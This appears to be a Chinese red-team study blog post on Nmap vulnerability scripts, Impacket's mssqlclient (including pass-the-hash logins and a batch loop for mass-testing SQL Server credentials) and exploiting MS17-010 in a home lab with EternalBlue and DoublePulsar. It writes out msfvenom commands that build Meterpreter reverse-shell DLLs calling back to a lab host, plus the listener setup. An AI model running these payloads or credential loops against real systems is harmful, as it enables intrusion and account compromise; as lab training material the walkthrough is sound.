常见应用漏洞扫描&利用


本章节内容为Nmap扫描常见漏方式,mssqlclient和ms17-010脚本的使用方法。

文章内容主要摘自某红队系列丛书,将市面上现在流传的 redteam 系列书籍进行一个学习记录。

Nmap扫描技巧

  • auth 处理身份验证
  • broadcast 网络广播
  • brute 暴力破解
  • default 默认
  • discovery 服务发现
  • dos 拒绝服务
  • exploit 漏洞利用
  • external 外部扩展
  • fuzzer 模糊测试
  • intrusive 扫描可能造成不良后果
  • malware 检测后面
  • safe 扫描危害较小
  • version 版本识别
  • vuln 漏洞检测

通用参数 -vuln

nmap --script=vuln 192.168.1.2

MS17-010

nmap --script=smb-vuln-ms17-010 192.168.1.2

impacket框架之mssql服务器安全检测

在实际渗透测试工作中经常会遇到检测项目中mssql服务器安全性,此篇文章介绍impacket框架中mssqlclient的使用方法

impacket for windows

mssqlclient与其他工具相比的优势

  1. 跨平台,python脚本编写,并且已有exe版本
  2. 命令行执行,速度快
  3. 支持使用socks代理传输数据
  4. 支持以hash传递的方式进行账号验证
  5. 支持windows认证模式进行mssql服务的安全检测
  6. 支持sql命令可以是交互式,也可以直接回显sql命令执行结果

Mssqlclient的基本使用命令

验证以windows认证模式的mssql服务

python mssqlclient.py domain/username:password@ip -windows-auth

验证以mssql账号密码认证的mssql服务

python mssqlclient.py ./username:password@ip

验证以mssql账号密码认证的mssql服务,并执行command.txt内的sql命令

python mssqlclient.py ./username:password@ip -file command.txt

举例分析几种实际使用情况

1.在linux环境下使用windows认证模式,mssqlclient测试登录sqlserver服务器,如下图,账号验证通过后直接返回sql shell

![](/Users/f1ve/Library/Application Support/typora-user-images/image-20220520120210750.png)

2.使用ntlm hash验证方式,mssqlclient测试登录sqlserver服务器,账号验证成功后返回sql shell

python mssqlclient.py -hashes :579da618cfbfa85247acf1f800a280a4 ./sa@192.168.186.5 

批量检测

除此之外,还可以批量检测内网SQL server服务器的账号安全性。

需准备的文件有:

  • mssqlclient.exe(必须)
  • command.txt(必须)

以下四个文件需选其一

  • hashes.txt(需验证的ntlm hash字符串列表)
  • username.txt(需验证的username列表)
  • password.txt(需验证的密码字符串列表)
  • Ips.txt(需验证的ip字符串列表)

举例批量检测的bat脚本内容

测试以windows认证模式,使用明文密码验证,使用mssqlclient批量测试登录sqlserver服务器,ips.txt内容为待检测sqlserver服务器ip,每行一条

for /f %%i in (ips.txt) do mssqlclient.exe ./test:test@%%i -windows-auth

在cmd中可以把 %%i 替换为 %i 直接执行

可根据此模板更换批量检测的位置

MS17_010.py 脚本利用

前言

为什么要介绍py脚本?因为有些机器存在漏洞,但使用MSF的模块利用失败,而使用py脚本则能成功利用

利用

必要工具 python2.6.6pywin32-221.win32-py2.6.exeshadowbroker(必需要严格按照版本安装才能正常运行)

在本地用虚拟机搭建了Kali和Windows系统
192.168.186.8	windows7 IP	脚本操作机
192.168.186.5	win2003 IP	靶机
192.168.186.2	kali IP		用于shell回连

在kali中用msfvenom生成64位的dll

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.186.2 LPORT=4444 -f dll > x64.dll

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.186.2 LPORT=4444 -f dll > x32.dll

在msf中配置监听模块

msfconsole		进入控制台
use exploit/multi/handler	//使用监听模块
set payload windows/x64/meterpreter/reverse_tcp	//设置payload
show options	//查看配置信息
set LHOST 192.168.186.26	//设置本地IP
set LPORT 4444	//设置本地端口
run	//运行

进入到shadowbroker文件夹下的windows文件夹中打开fb.py,根据提示输入参数

使用Eternalblue模块攻击

使用Doublepulsar模块回连shell到kali

接下来一路回车,之后在kali上获得shell

NSA-ms17-010参考文章

https://blog.csdn.net/weixin_38948797/article/details/79177880


文章作者: f1veseven
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 f1veseven !
评论
  目录